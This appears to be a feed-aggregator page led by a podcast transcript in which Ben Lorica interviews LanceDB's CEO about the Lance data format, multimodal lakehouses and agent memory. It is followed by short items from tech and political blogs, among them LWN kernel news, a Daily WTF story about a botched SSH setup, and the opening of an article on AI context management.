About the Generative AI in the Real World podcast: In 2023, ChatGPT put AI on everyone’s agenda. In 2026, the challenge will be turning those agendas into reality. In Generative AI in the Real World, Ben Lorica interviews leaders who are building with AI. Learn from their experience to help put AI to work in your enterprise.

Check out other episodes of this podcast on the O’Reilly learning platform or follow us on YouTube, Spotify, Apple, or wherever you get your podcasts.

Transcript

This transcript was created with the help of AI and has been lightly edited for clarity.

00.35
All right, so today we have Chang She, CEO and cofounder of LanceDB, which you can find at lancedb.com. Tagline is “Build better models faster.” So Chang, welcome to the podcast.

00.49
Hey Ben, super excited to be here.

00.52
All right, we’ll jump into the core topics, but a bit of a background there for our listeners who may not be familiar with you. You worked on pandas—you were a core member of the pandas team. You were very early on with Parquet as well. And at some point, you became convinced that for AI workloads, these former tools that you worked on—Parquet, pandas—were not enough. So what was the moment of realization for you that these traditional tools that were foundational for analytics were lacking?

01.33
Absolutely. So I worked at a company called Tubi TV, which was video on-demand and streaming. So movies and TV. And it was there that I ended up dealing with a lot of I guess what I would call AI data. So we had to have embeddings for personalization, video assets, image assets, audio, text for subtitles and all of those things. All of those did not really fit into the traditional data stack—you know, pandas, Spark, Parquet, and even Arrow. So that was sort of the inspiration for me to start LanceDB.

02.15
And Chang, at this point, do you think that more people are aware of this disconnect between those tools and the kinds of tools they’ll need moving forward?

02.30
When I talk to data infrastructure folks who are building and managing that stack for dealing with this kind of data, there’s broad recognition that something has to be done, that the existing stack is just not sufficient to deal with this data. And what’s more interesting is that this data is also becoming a lot more valuable because of AI.

02.52
So obviously, before you came on the scene, there was this wave of vector stores or vector databases which were optimized for retrieval. So let’s say I’m a listener and all I have is text. Do I need anything beyond the vector database?

03.17
Even if you just have text and you just have text embeddings, the creation of those embeddings and then the management of all of those data assets—your metadata, the actual documents, how to serve that—a lot of that falls outside the purview of a vector database. The vector databases tend to be very narrow solutions for a very narrow problem, whereas something like LanceDB takes a broader view of, “When you have AI data, what are all the things you need to do to it throughout that life cycle of application development or model development? And how do we build a tool and a system that allows you to simplify your life by having one system to do all of the major workloads throughout that life cycle?”

04.13
And by the way, for our listeners, there’s LanceDB and then there’s the open Lance file format, and I wanna ask you about this file format in a second, but you mentioned something about vector databases and you were kind of saying that, you know, they’re not great at creating the embeddings. But Chang, the vector database people, they never really positioned themselves as responsible for creating the embeddings, right? So they just assume that you’ll show up with embeddings.

04.47
That’s right. But even if you take that narrow view, what we find in enterprises today is a lot of folks have an offline generation process in the data lake itself, where they chunk up the documents, then they generate the embeddings, then they have what they call an offline store, then they have to copy-paste that data into a vector database for serving. So there’s a lot of data syncing [and] data movement, so it creates expense and there’s a lot of complexity.

And so that’s the. . . Even for just text-based workloads, even just for pure vector search, that tends to be a big pain point. And then two is vector databases, a lot of times, don’t pay as much attention to the overall retrieval stack, right? If you remember, the task for users is I want to find the right data in my dataset, and vector search is just one technique. You have many different kinds of techniques, full-text search, or even just outside of search. You might have SQL queries that you want to run, filters, regexes, all of that goes into a rich and very accurate retrieval process. And vector databases, in general, do not expand beyond just that simple semantic or vector search.

06.10
So I mentioned the Lance open file format, which. . . I guess the shortcut that people use is like Parquet for AI, but it’s actually both a file and table format. So maybe give our listeners, Chang, a high-level description of the Lance format and why it’s become so popular.

06.33
Lance is what we call a lakehouse format. It is quickly becoming the new open source standard for multimodal data. And what I mean by a lakehouse format is that it spans a couple of different layers. So you mentioned in the beginning a file format. So this is the equivalent in the stack to Parquet, where we would talk about “How do we lay out the data in a particular file?” And at this layer, the innovation in Lance is that it is really, really good for random access without sacrificing any speed and scans. And our files are actually smaller than Parquet for many AI datasets.

The next layer is usually what we call a table format that is occupied by projects like Iceberg and Delta and Hudi today. And [the] Lance format comes in at this layer. We have much better designs, more optimizations for machine learning experimentation, so doing backfills easily, doing two-dimensional data evolution, being able to handle really large blob data like videos and images, and then just being able to do a branching strategy that supports true sort of Git for data semantics that takes the best of Parquet and Iceberg. 

And then finally, there’s a third layer, which is about indexing so that you can have fast scans, fast searches, fast queries. So when you put all that together, that’s what we call the Lance lakehouse format.

08.11
I described Lance as open. Can you kind of clarify what that means, because I actually don’t know?

08.19
Number one is Lance format is open source. It’s Apache 2.0 license. You can find it on our GitHub. We have community governance; [we] have PMCs that are from lots of external contributors. And then I think beyond that, there’s open source and there’s open source, right? I think what Lance format is designed for is a true open architecture as well. So not only is it open source; it also plays really well into the rest of the data ecosystem. 

So for example, when people compare us to Parquet and Iceberg, well, we’re not designed as a head-to-head competitor with Parquet and Iceberg. We will slot into the same Polaris data catalog, or you can have one unified view on all of your datasets, but then under the hood it can be Parquet/Iceberg for BI data and Lance for your AI data. And then Lance itself plugs in natively to Spark and pandas and Polars and DuckDB and any sort of open data tooling that you’re already used to.

09.31
So operationally then, Chang, if I’m a data architect, should I think of Lance as, “OK, so I have Parquet and these table formats like Delta and Iceberg for my structured data. And then if it’s nonstructured, which could mean video, audio, and also text, right? So then I have to bring in this other format, Lance.” Is that operationally what happens in practice?

10.07
Yeah, often what the data infra folks and data engineers we talk to interact with is the tooling, right? So they’re looking at their data pipelines, they’re looking at maybe their Spark jobs or their search applications, and then those are the jobs that actually interact with the underlying storage, for example. And so instead of. . . 

And that data transfer process is actually really easy through Apache Arrow. And most of the time, it’s really just one line of code change. It’s the same Spark code, for example. Instead of writing to Parquet, you’re writing to Lance. And it simplifies your overall data pipeline by bringing all of your tabular data and metadata along with your multimodal data all in the same place and also embeddings.

11.05
And then in terms of workload, you alluded to the fact that the previous-generation vector source, they excelled at something very specific, maybe retrieval. So is Lance equally specialized in the sense that, “All right, Lance is great for X, and X might be, I don’t know, analytics, but it doesn’t excel in other things”? Describe the kinds of workloads that teams that are using Lance are using.

11.39
So very high-level, the summary is LanceDB, our enterprise data platform, excels at helping our customers manage really large-scale AI data. So embeddings for search, adding new, adding new features and extracting new, new columns, enriching their dataset, doing data curation and exploration, and then feeding that to GPUs really quickly for distributed training jobs so that they can get as high GPU utilization and as high auto-flops utilization as they can.

12.20
You’ve used the word multimodal a few times, and I’ve always been a proponent of people really making sure that their data infrastructure is positioned for this multimodal world. But sometimes I question this assumption in the following sense, right? Is multimodality a Bay Area bubble thing? In other words, if I go to the East Coast and talk to, I don’t know, Goldman Sachs or an insurance company, are they still grappling with legacy systems that are mostly structured data? What they want to do is be able to do all this fancy AI stuff now with agents, but still using the old-school data that they have.

13.12
I think when we talk about multimodal data, a lot of times what comes to mind first is video generation, image generation, all of those. Self-driving cars. . . So there’s a lot of high-tech, cutting-edge applications that are multimodal. But I think if you look at more traditional enterprises, they already have a lot of multimodal data. 

So you just mentioned insurance: They have millions of documents and PDFs and contracts lying around. Insurance especially will have top-down views of houses and boundaries so that they can figure out and assess risk a little bit better. The way I think about it is before AI, it’s just really hard to get value out of that data. They just really haven’t paid as much attention.

So it’s kind of like when I clean up my house, what I like to do is just like move all the mess into a back room or storage. And so then I don’t have to think about it, right? My wife yells at me all the time. She opens up the storage and everything kind of falls out. And so I feel like with multimodal data, this is kind of what traditional enterprises have done: They didn’t know what to do with it. They stuck it in some directory in SharePoint or something like that and kind of just like leave it there for storage. But there’s actually a tremendous amount of value and AI is helping them unlock all of that. So I think in the next few years, especially, we’re going to see a lot more attention paid to, “If we can get a lot more value out of this data, how do we actually manage it? How do we work with it? And how do we combine it with the rest of our data stack so that it’s governed within a single entity?”

15.06
The hot thing a few years ago in data infrastructure was the lakehouse, right? Great term we introduced. [laughs]

15.18
I wonder who came up with that one. [laughs]

15.22
Yeah. So you folks are starting to use the term multimodal lakehouse. So compare the status of the lakehouse. . . [The term] is I think now widely used, right? And then now you’re introducing the multimodal lakehouse. So where is the multimodal lakehouse now kind of mature, and where does it still need to do some work?

15.50
Just for the audience who’s not as familiar, the really, really simplified way I think about just a lakehouse is you have all your data in one place in the data lake, and then you have a combined data warehousing layer on top that provides structure, tables, and structured ways to run workloads on all of that data. 

Now, the way we think about multimodal lakehouse is in a couple of different ways. One, the data changes so that you go from purely tabular data or maybe like clickstream data to now all sorts of multimodal data. So from embeddings to all of your multimedia types. So that changes a lot about how you can read and write data efficiently, how you manage that, how you synchronize that with metadata.

Number two is the workloads also are multimodal. You’re not just thinking about running SQL and analytics workloads. You’re now thinking about search. Now you’re thinking about training. Now you’re thinking about feature engineering and “How does your lakehouse interact with GPU clusters?” and all of those things that traditional lakehouses are not very good at.

And then I think the third layer, where the meaning “multimodal” comes in, is traditional lakehouses tend to be good only at batch offline processing. And then if you want to do serving, online processing, you probably need to introduce a sort of an OLTP kind of database or some system that’s primarily for serving. Well, with LanceDB, because of the innovations in the format, you can actually do both at the same time. So the online-offline scenario can also become multimodal in this sense.

17.44
So if I understand what you’re saying, you’re multimodal in multiple senses. So multimodal data types, multimodal workloads, and multimodal kinds of operations. So right now, in the Databricks world, they have—I don’t think they used the word multimodal. If anything, they go back to that HTAP kind of thing, so [a] hybrid transactional analytics kind of processing engine. I think through an acquisition, now they are very good at Postgres. I forget what they call this. [Chang: A lakebase.] So they have the transactions, and they have the analytics. So what you’re saying is that your vision of the multimodal lakehouse has that hybrid transactional analytics, multimodal types of data, and then multimodal workloads. Is that a fair summation? Surely, Chang, certain aspects of what you just described are more fleshed out than others, right? So what areas do you anticipate you folks will be working on hard, in terms of multiple notions of multimodality?

19.16
Number one is actually scale. Scale is actually the biggest driving factor late last year and this year. And a lot of that has been the rise of agents. Because of the rise of agents, data volume and scale, query throughput and scale, and performance and latency requirements, all of those things have just kind of been exploded. And that’s the thing that we find we’re uniquely suited for. And that’s something that we’re pushing a lot on. Oftentimes when we talk to customers, really what we think about is like, trillion is new billion. And we have folks who probably are operating at a thousand times the scale that they were just a year ago or two years ago.

20.22
I guess the hack that people will do for some of these things, Chang, is just let’s put the files in S3 and then use a database somehow. So are you still seeing a lot of people kind of try to do this?

20.39
Yeah, I mean, I think there are a few attempts that [are] doing that. And I think there’s generally a trend because of the data scale, like object storage is kind of the only sort of cost effective and scalable storage backend for a lot of these newer data storage systems. I think where the challenge lies for data infrastructure providers is “How do you actually have scalability and high performance and maintain the cost advantages of S3 and object store?” That is, I think, the difficult challenge. And so we actually have a recent blog article talking about how we do that at 10 billion-vector scale.

At smaller scales, that’s actually really easy. You just slurp up all the data from S3 into some caching system. You can serve it from there in any in-memory system. That’s a really easy problem. There’s tons of open source projects, Lance, for example, that can help you do that pretty effectively. And then the challenge is really at scale. If you have 10 billion vectors, pretty much, your only cost-effective solution is to store that on object storage. Then, you know, imagine the query times if you were just targeting S3 directly. So then indexing challenges and search and caching and all of that, that becomes a big distributed systems problem. So that’s what we solve.

22.16
Like you said, many data engineering and data infrastructure teams are trying to think through, “So what does our infrastructure look like in a world of agents?” right? So imagine—this isn’t happening yet—the equivalent of OpenClaw in enterprise, where a single employee might have 10 of these AI delegates or AI assistants. Some of the things that come up: One, identity management, so access control, identity management. Secondly, maybe some of these AI agents and AI delegates don’t really need anything permanent. They just want something ephemeral. So stand up a LanceDB for a minute and then make it go away. Are these some of the things that you are starting to think of?

23.14
Yeah, so for our cutting-edge customers, that’s already the reality. We specialize a lot in infrastructure for model training, for example. So if you think about features, like a researcher might have, “Hey, I have a feature idea. There’s two input features, each with 10 variants. And then I have some output feature that combines the two.” Well, now I’ve got 100 different variants. So before, there was a limited [number] of variants that I can test as an individual researcher manually. But now I can use agents to run all of that automatically. And I can just go to sleep and it’ll run. Well, now humans can go to sleep, but then the agents are presenting a lot of load on the underlying data infrastructure. This year we’re talking about going from hundreds of queries per second from plain RAG a couple of years ago to a hundred thousand queries per second in this land of agents. 

And then when it comes to security and compliance, there’s a lot of churn in the stack about sandboxing and ephemeral systems. And when we talk about object storage, this is actually a big, even a bigger challenge, right? So if your source of truth is on object store, that’s actually the only way you can make this ephemeral workload work out well so that when you have hot data, you cache it, you serve it for a time, and then that can go away. And then the cache can expire it [to] be replaced by the next hot workload. And you can do that without having to pay for really expensive memory and NVMe for all of your data.

25.04
So the other thing, Chang, that comes up with agents right now, the hot thing that it seems like there’s a gazillion people working on is this notion of memory. So I guess my question to you is, if I have a bunch of agents and then I have a multimodal lakehouse. . . I have a lakehouse and now I have memories. So I have three different systems that I have to maintain. What’s your what’s your guys’ take in terms of agent memory?

25.42
LanceDB open source is actually the main memory plug-in for OpenClaw and a number of other agents like Crew AI, for example. And for a lot of these agent frameworks and harnesses, there’s a couple of different requirements. Number one is just lightweight, super easy to use. LanceDB is the only one where it supports hybrid search; it supports reranking, all these fairly sophisticated retrieval mechanisms, without having to maintain a service.

26.20
Before you continue. . . All right, so this notion of lightweight, right? On the one hand, there’s the notion of multimodal lakehouse and a lakehouse is never lightweight, right? But then, it seems like you folks are positioning yourself also in the DuckDB kind of very lightweight SQLite world. Can you clarify what you mean by lightweight when you are supposedly a lakehouse, right?

26.49
So what I mean by lightweight here is that if you think about it from an agent perspective, it simplifies a lot of things if you don’t have to connect to another service and talk to another system in order to get access to your memory and to retrieve from memory. So that’s what I mean. So the open source, the. . .

27.15
But then you’re large-scale infrastructure. . . So then if I’m a lightweight agent, how can you… This is where I guess I’m a bit confused. Can you clarify, why am I bringing along a big piece of infrastructure if I’m a lightweight agent?

27.37
Right. LanceDB open source is actually very lightweight. So there’s no heavy infrastructure involved. This is why it’s perfect for memory. Because a lot of times, memory is very ephemeral. So you just interact with a session and then when that session is gone, you want to retain all of that. At most you might want to compress some of it and then retain it for downstream historical processing. But most of the time, it’s just gone. You don’t have to think about it. And so that’s what I mean by lightweight. So there’s a version of that. 

And then for large-scale retrieval, you have a large historical corpus, if you’re working in a corporate environment, if you have an agent that’s searching through patent history or something like that, right? And then that’s where the infrastructure comes in. Well, if I have a petabyte of data out there that I need to search through, the embedded library is not going to do. So you need to have a scalable system out there, but it needs to be easy to use. And from an agent perspective, it’s the same interface. So from the agent perspective, it’s just as easy, but there is a scalable system for that large amount of data that’s kind of hidden beneath the surface there. 

I think for agents, that’s sort of just one of the requirements. The other one is having more sophisticated retrieval so that agents can find what they’re looking for. And different agents will want to look for data in different ways. So being able to support all of that without having like a million different plug-ins to do each modality, I think that’s also something very important for agents as well.

29.28
By the way, I was playing devil’s advocate there because I actually use LanceDB every day on my laptop. It can be something that you can use in your laptop just in-memory.

29.42
Yeah. So I think what we find is that when you make it really easy for agents to actually use it, that’s when scale really takes off. The way we’re looking at it is agents are kind of like an ideal gas that if you make it easy for them to use, no matter how much compute you have, no matter how much data and infrastructure you have, agents will expand to fill all of that that you have, right? So what we’ve seen is. . . We talked about growth and creep throughput. And then because of complex agents, there’s compression and latency. Your agents want a hundred-millisecond or like 20-millisecond latencies now. And then we also see a lot of proliferation of data.

One of the largest users in LanceDB told us they’re now managing something like a billion tables. Just because they have so many agents and so much data that they have to manage, like that number of tables within their system. Any computational and data management dimension you can think of, agents will expand to however much capacity you give them.

30.59
So this is a two-part question. Our listeners may not be aware, but for some reason, LanceDB kind of blew up a little more during the launch of OpenClaw. So I guess my two questions are one: How did this OpenClaw community land on Lance? And have you heard back from them, and have they told you what they liked about Lance?

31.32
Yeah, I mean, a lot of that is what we just talked about: It’s lightweight; it’s easy to use the model.

31.39
But how did it happen? How did they land on Lance? Do you know?

31.43
So my recollection was that originally it was a recommendation from Claude or something like that. And I think [Lance] was the only one out there that met the requirements, was embedded, lightweight, sophisticated retrieval. And it can do both in-memory on NVMe local and also on object store.

32.11
Interesting. So since then, has this kind of marriage [with OpenClaw] continued?

32.20
Yeah, we continue to see engagement from the open source community. Our open source continues to grow. I think at the latest, we’re at around 14 million downloads a month across our open source projects. And we’re super excited about working and supporting the open source community on that. What we see now is demand for a more filesystem-like interface. It’s easier for agents a lot of times to interact with a filesystem interface.

Now, I’m choosing my words carefully. I don’t mean a filesystem. I just mean an interface. This is something that we’re looking into—trying to see what it would look like to put a filesystem interface over a LanceDB or Lance format. Based on the usage patterns that we see from agents, this is fairly straightforward to do. So I think if you’re listening and this is something interesting, we’d love to have early users come check it out and test it out with us.

33.29
It’s interesting, actually, as you were talking there, it just dawned on me that this notion. . . These various notions of multimodality that you described earlier actually might be another reason why people landed on Lance. Because there are other vector search systems that you can run in-memory or embedded. If you want to build agents that are more capable moving forward, then the various notions of multimodality that Chang described earlier might come in handy, right?

34.06
Yeah, yeah, absolutely. I will say that like, I’m sort of a. . . There are AI maximalists. I’m sort of a multimodal maximalist. So my prediction is that in five years, multimodal won’t even be a word anymore. It’ll just be data, and it’ll just be multimodal by default. People will just say data, and it’ll be inclusive of all the different modalities. And when we think about data engineering, there won’t be multimodal data engineering. It’ll just be multimodal by default when we say data engineering.

34.37
Interesting, which actually. . . As we’re winding down here, I was going to ask you, If I’m a CxO or an architect at an enterprise, what data infrastructure decision do you think I should bear in mind? Or I guess to put it negatively, what are some of the decisions I can make right now that potentially can hurt my team moving forward in the next year?

35.08
Right, right. So I think we’re already. . . For a lot of early adopters, we see big pain points around new AI data silos. So one pattern, I wouldn’t call it an anti-pattern, but one I would say pain point is if you’re a CIO or CDO or something like that, chances are a lot of your teams within the enterprise have charged forward with their own AI applications and AI stack. And so now the centralized data platform team are faced with maybe like 10 different vector databases that they have to support and maybe five different ways to store the AI data, some in images and some just embeddings and others, many different modalities. So that becomes a big pain point going forward, right? So as companies go from “Let’s try out AI in this particular area” to, I guess, AI transformation, having large swaths of the enterprise be AI-assisted or AI-native, that becomes a big pain point. 


I think if I were a CIO or a CEO or CTO at a larger enterprise, I would be looking forward a little bit to think about how do I set up all of my teams across the enterprise for success so that one, “How do I allow them to charge forward very quickly and iterate very quickly without presenting this crazy, untenable challenge on the central platform team?” So that’s what I would be thinking of. That’s actually. . . At LanceDB, that’s what we’re building for.

37.05
If your thesis is multimodal data matures over the next few years, and so do agents and everything that comes with agents, including memory, what does the data stack look like in a few years?

37.22
In broad strokes, the base layers are not going to change all that much. I think the infrastructure layer stays roughly the same. There’s going to be object storage. There’s going to be a storage layer. And then the compute layer will start to change. 

37.49
Ray. [laughs]

37.52
What I think we’ll see is that the middle layer of data tooling will start to melt away a little bit because of agents.

38.04
Define data tooling.

38.07
I don’t want to name names, but I think there’s a lot of [what] I would call developer middleware for data where it’s neither the infrastructure layer nor is it the layer that’s interfacing with agents and users directly, right? That middle layer, I think will melt away a little bit or at least be very much refactored. So there’s going to be a lot of churn in that. It’s going to be interesting to see what shakes out. I think what will happen is that agents will continue to push that layer down, and agents will want to get as close to the base layer as possible. 

If you look at this middle layer, there’s really two things that they’re providing. One is a precanned data model for how their users think about the problem, right? So they built that on top of the base infrastructure. So they would build that on top of LanceDB, for example. And then the other thing that they have in this middle tier right now is user interaction, right? The combination of the two is how they capture user workflows. And that’s the core of that. I think what happens in the future is that that UI workflow layer will largely go away and be replaced by agents.

But useful data models will still be useful, and they’ll still stay. Yes, you can have agents directly talk to random bits on S3, but why waste all that intelligence? It’s not worth the token cost. A well-formed data model is the right base layer for agents to interact with. And so I think that’s what we’ll see, is that melting away and reformatting of that middle layer. And I think this is something when I talk to data builders and AI infrastructure builders today, I think we’re all seeing that all at the same time.

40.22
What I describe to people right now as kind of the forward-looking stack has two main parts: So one, you have the multimodal lakehouse built around Lance, LanceDB, and the Lance format. And then you have the AI compute layer, which I call the PARK stack, so PyTorch, AI foundation models, Ray, and Kubernetes. So PARK stack here, and then your lakehouse will be around Lance and the Lance format. I see that quite a bit actually. I definitely see the PARK stack, PyTorch, Ray, Kubernetes. And now I’m starting to see more and more people talking about Lance and Lance format. Do you think of these as complementary or what?

41.16
Yeah, yeah, absolutely. I think we have close relationships with Ray and Spark and really like native-level integrations. And also PyTorch, right? I don’t think that’s going away. Those are either like. . . PyTorch is essentially interacting with developers directly, whereas Spark and Ray are very much infrastructure layer, so I don’t think those things are going anywhere. Kubernetes is definitely still around.

41.51
Yeah, yeah, yeah, yeah. And so what big trend are you paying attention to right now that we haven’t yet talked about? This is how we close.

42.08
What’s been really interesting that we didn’t talk about is the rise of open source models. And I think that’s going to have a big impact, maybe starting next year or even the remainder of this year. Enterprise AI. [Ben: Open weight.] Open-weight models. That’s correct. Yeah.

42.35
Who’s the source? Because right now the main source is China for the better ones. And I still see a lot of hesitation for enterprise teams to adopt such models. I actually just wrote a short post about this. Basically the perception seems to be that while the open-weight models from China are closing the gap, there is still a gap, and there’s structural reasons why there’s a gap. So one is the Chinese seem to be benchmaxxing. You know, they’re optimized for the benchmark, so not real workloads. And then secondly, there is a compute challenge, which makes iteration for them more challenging. So whereas the labs here may update their models every three or four months, the Chinese have to wait six months. And then finally, the data pipelines and the investment in data pipelines is just not the same as you would see at, for example, Gemini, Anthropic, and OpenAI. They’re licensing data from all over the place. The Chinese labs tend to do distillation, which means. . . When you’re doing distillation, your cap is basically the model you’re distilling from.

And then there’s the flywheel—OpenAI and Anthropic and Gemini have a lot of users, so therefore they get better as more users interact with them. . .

44.20
That’s right. Don’t forget the open-weight models in China are also. . . [cross-talk] Here’s the way I think about it, right? So I think as AI adoption grows exponentially within enterprises, they are going to be extremely motivated to invest in their own inference on open-weight models, right? Just because there’s such a drastic cost in tokens.

Because of that economic incentive, I think there’s going to be a lot more incentive for companies to create better open-weight models. If you look at the open-weight models in China, one, the fact that they can create open-weight models of this quality on really limited hardware is really telling. So a team in the US theoretically should be able to create much better quality open-weight models because of that.

Number two, I don’t think the distillation argument is actually true. If you look at the report that Anthropic threw out, right, like if you look at the numbers of how much distillation they accused DeepSeek of doing, it’s actually not that much. It’s basically negligible, right? Like MiniMax is a legit big offender, but DeepSeek, basically, didn’t really do that much. I don’t think distillation is a big factor in the quality of open-weight models anymore.

So then there is a remaining gap in quality. Maybe there’s a three- to four-month gap between open-weight models and SOTA. But what’s interesting is the experiments that people have done is, open-weight models, one, are cheaper, and they’re much faster. So if you have a coding agent task, you can do a one-shot with SOTA models or you can do multiple rounds and iterations on an open-weight model, which gets you the same quality, still lower total costs and tokens, and you finish around the same time, or you actually might finish faster. So then I think a lot of that is lack of familiarity and a skill gap, where if you have to do a few shots, that complexity is way more than what people want to think about right now.

So the pattern today is you go into production with SOTA models, then you reach some cost-prohibitive moment where you say, “OK, what are the areas where there’s not requirements for really heavy intelligence but still have a lot of token costs, and then I can replace [them] with open models?” And I think that will happen more and more across enterprises. So I think that’s going to be a big trend to watch this year and next.

47.18
And actually, as you mentioned, my conversations are a product of the fact of the stage of adoption, which is basically [the] early stage of adoption. I will deploy with state-of-the-art models because I’m early. And then as my agent or my application gets used, then I start paying attention to cost, latency, and all these. And then I can worry about swapping the models then. And hopefully, we will have some Western labs start cranking on open-weights models again, right? It seems like Meta is off the table. The Gemma folks produce models, but they’re meant for on-device, I think. Maybe there’s an opening there for someone to start up something that…

Especially as people become more clever in terms of training and tools like LanceDB make training more affordable somehow. We’ll see what happens. And with that, thank you, Chang.

48.24
That’s right. Thank you, Ben.

17:56

Urgent: Shut down the hidden sweatshops of data workers [Richard Stallman's Political Notes]

US citizens: call on Take Action: Shut down the hidden sweatshops of data workers.

See the instructions for how to sign this letter campaign without running any nonfree JavaScript code--not trivial, but not hard.

I ask you follow me in expunging the acronym "AI" from your letter.

Sending asylum seekers to a country they've never been [Richard Stallman's Political Notes]

Australia's cunning cruelty of sending asylum seekers to (in effect) prison in a country where they have never been is now spreading world-wide.

17:28

Upcoming Speaking Engagements [Schneier on Security]

This is a current list of where and when I am scheduled to speak:

The list is maintained on this page.

16:56

Link [Scripting News]

Every social web needs avatars. In an RSS 2.0 feed look for the channel-level image element. It's how they do it in WordPress.

Link [Scripting News]

This is the first day since the NBA playoffs started that there is no scheduled game. I think that's why today feels so weird.

Link [Scripting News]

For some reason every day feels like Saturday. I don't know why.

16:07

[$] Buffered atomic writes, writethrough, and more [LWN.net]

In back-to-back sessions at the start of the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit (which spilled over into a third slot), the atomic-buffered-writes feature was discussed. In the first session, Pankaj Raghav and Andres Freund set the stage with an introduction to the problem, along with a use case for its solution: the PostgreSQL database system. In the second, Ojaswin Mujoo described a potential way forward for the feature using an approach based on writethrough, which effectively means that the kernel immediately writes the data to disk instead of waiting for writeback from the page cache to occur. As might be expected, there was quite a bit of discussion among the assembled filesystems and storage developers during the combined sessions for those tracks.

Three stable kernels for Thursday [LWN.net]

Greg Kroah-Hartman has announced the release of the 7.0.7, 6.18.30, and 6.12.88 stable kernels. These kernels do not include a patch for the Fragnesia local-privilege-escalation exploit that came to light on May 13, but do include many other important fixes throughout the tree. Users are, as always, advised to upgrade.

15:21

Suddenly, Irises! [Whatever]

Athena started the bloomposting yesterday and here is my contribution: the irises in our front yard, which are in their annual two-week period of blooming, followed by 50 weeks of just being green shrubs. Still, for those two weeks, it’s pretty great to look at.

The irises have come in nicely this year

John Scalzi (@scalzi.com) 2026-05-14T12:42:09.714Z

I of course can take no credit for these irises. Krissy planted them several years ago and tends to them annually; I just go out and take pictures of them when they’ve all popped. Still, I flatter myself that I take some fairly decent pictures of them. And then you get to appreciate them as well! So, please do.

This concludes our bloomposting for today, now back to our regularly scheduled programming.

— JS

14:35

[$] Keeping COWs in context (a.k.a. anonymous reverse mapping) [LWN.net]

The kernel's reverse-mapping machinery is charged with locating the page-table entries that refer to a given page in memory. The reverse mapping of anonymous pages is handled differently than for file-backed pages. The kernel's implementation of reverse mapping for anonymous pages is, according to Lorenzo Stoakes in his proposal for a memory-management-track session at the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit, "a very broken abstraction", due to its complexity. It also has some performance problems. Stoakes was there to present, in raw form, a proposed replacement that he calls a "COW context".

Security updates for Thursday [LWN.net]

Security updates have been issued by AlmaLinux (gimp, jq, and yggdrasil), Debian (nghttp2 and thunderbird), Fedora (chromium, firefox, freerdp, GitPython, kernel, kernel-headers, krb5, nano, nix, nodejs20, php, python-click, python-django5, SDL2_image, and xen), Mageia (dnsmasq, flatpak, kernel, kmod-virtualbox, kernel-linus, perl-Net-CIDR-Lite, perl-XML-LibXML, and redis), SUSE (dnsmasq, firefox, jupyter-jupyterlab, kernel, krb5, libvinylapi3, log4j, Mesa, mozjs60, NetworkManager, OpenImageIO, python-Mako, python-Pillow, and python39), and Ubuntu (dnsmasq and nginx).

14:07

The Pride Goeth [The Daily WTF]

Janči, a master's student of bioinformatics, was seated near the back of a large classroom. This was a simple compulsory elective course geared toward biologists. The professor was currently walking the class through their latest assignment. "We'll need to connect to some Linux servers," he announced.

The other students seated nearby traded blank stares. They were all Mac and Windows users with no IT background. Meanwhile Janči, a veteran Linux user, started feeling a little smug. An easy A was at hand.

Roman key (FindID 519853)

"First," the professor continued, "you'll need a private key."

After the professor had explained a few details, the first WTF came in the form of a bulk email sent to the entire class. The private key was attached. The username was the email address it was sent to.

What do you call the exact opposite of a private key? Janči wondered, bemused.

"You'll also need to download an application to help you log in," the professor said. "I recommend MobaXterm."

As he detailed the process of visiting the SSH client website to download the software, Janči tuned out. He didn't need such hand-holding. He accessed OpenSSH, tried connecting ...

... and failed.

Meanwhile, everyone around him was logging in no problem.

Janči's face burned with embarrassment at this second WTF. His first instinct was to blame the deprecated cryptography of the server. He spent most of the remaining lecture time searching for a way to allow his SSH to use SSH-DSS. (It turned out to be supported the whole time, despite the warnings he received.)

Janči then tried to re-download the "private" key and adjust the SSH config file several times. He cycled through different possible usernames associated with his university email account.

No dice.

He was the only person in the class who hadn't yet logged into the server. Not even the professor was able to help him, since he was using Linux.

Embarrassment and frustration mounted. An hour later, out of ideas, Janči fell back to downloading MobaXterm and running it inside Wine.

It didn't work.

The professor offered him a spare Windows box. "Here, try this one."

Janči booted it up, copied the "private" key to the new machine ... and still couldn't sign in.

Now, this was getting suspicious.

The lecture ended. A friend of Janči's hung back while the rest of the students filed out. "Why don't you try logging in with my credentials instead of yours?" she asked.

Janči was up for anything at that point.

It worked. On his own machine, on the Windows box, everywhere.

With that lead in mind, Janči opened the server's /etc/passwd file to look at all the usernames. He noticed that, unlike everyone else, his username and email address didn't match.

His university used Microsoft emails. Everyone had several address aliases, and they could also use whatever email address they liked in the system, even a personal one.

Janči had chosen to use a school email in the form of <number>@uni.uni. Unfortunately, the Ubuntu server didn't like the idea of user being named just <number>, so it had renamed it to user<number>. Some script for generating SSH configuration had probably failed from there, because Janči also discovered that his user home directory was missing a .ssh directory and known_hosts file.

Unfortunately, due to restricted access, he wasn't able to copy them from any of his classmates. In the end, he could connect to the server as any of his classmates, but not as himself.

[Advertisement] Picking up NuGet is easy. Getting good at it takes time. Download our guide to learn the best practice of NuGet for the Enterprise.

13:49

Why Doesn’t Anyone Teach Developers About Context Management? [Radar]

This is the sixth article in a series on agentic engineering and AI-driven development. Read part one here, part two here, part three here, part four here, and part five here.

I think context management is one of the most important skills in AI-driven development, and it’s weird that compared to other AI-related topics, almost nobody talks about it. We talk about prompt engineering, about which model to use, about agentic workflows and tool use. But more than anything else, the thing that actually determines whether your AI session produces good work or mediocre work is how well you manage context (or if you even do it at all!).

A lot of developers using AI tools treat all this “context” talk as AI jargon that can be dismissed, and it’s not hard to understand why. AI development tools have gotten so easy that an experienced developer can be incredibly effective by just combining vibe coding with critical thinking (that’s the central idea behind the Sens-AI Framework), and not really think about context at all. That’s ironic, because despite all the “I’m functionally illiterate but I just vibe coded an entire multitenant SaaS platform” articles, and despite everyone’s general concern that AI will put all developers out of work, the development skills you’ve been working on for years make you especially effective at writing code with AI—and context management is where those skills really shine.

Just to make sure we’re all on the same page, context is (basically) everything the AI is thinking about right now: your prompt, the conversation so far, the files it’s read, the decisions you’ve made together. When you start a fresh session with an AI, its context is wiped clean, and it starts fresh with just the initial instructions it’s been given. Managing context is central for building AI agents and skills. But it’s also really important when you’re using tools like Claude Code, Cursor, or Copilot for day-to-day development work. Context is typically measured in tokens, and there’s a finite amount of it. When the context window, or the maximum amount of information (input and output tokens) an AI model can process and retain at once, fills up, the AI starts losing track of things, and that’s when you start to see it give wrong and weird answers.

